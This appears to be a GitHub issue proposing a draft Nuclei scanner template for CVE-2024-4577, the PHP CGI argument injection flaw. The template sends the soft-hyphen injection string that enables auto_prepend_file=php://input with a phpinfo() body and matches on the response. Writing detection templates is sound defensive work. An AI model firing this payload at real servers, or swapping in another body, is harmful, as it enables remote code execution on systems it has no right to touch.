### ISSUE TITLE
CVE-2024-4577 - PHP CGI Argument Injection Vulnerability

### ISSUE THREAD

**Issue by sw0rk17** [projectdiscovery/nuclei-templates#9990]
### Template Information:
This is a first draft of nuclei template for the recent PHP CGI command injection vulnerability (CVE-2024-4577). This vulnerability allows for command injection, leading to remote code execution (RCE).

References are based on the following link:
- https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/
- https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?123
- https://x.com/watchtowrcyber/status/1798965072582312077

### Nuclei Template:

```yaml
id: CVE-2024-4577

info:
  name: PHP CGI Command Injection (CVE-2024-4577)
  author: sw0rk17
  severity: critical
  description: |
    A vulnerability in PHP CGI mode allows for command injection leading to RCE.
    - https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/577/?123
    - https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?123
  tags: cve,cve2024,php,cgi,rce

http:
  - method: POST
    path:
      - "{{BaseURL}}/index.php?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input"
      - "{{BaseURL}}/php-cgi/index.php?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input"
      - "{{BaseURL}}/test.php?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input"
      - "{{BaseURL}}/test.hello?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input"

    body: "<?php phpinfo(); ?>"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Version"
      - type: status
        status:
          - 200
```

I don't have any positive results to share yet. However, I feel it's better to share it with the community and contribute.
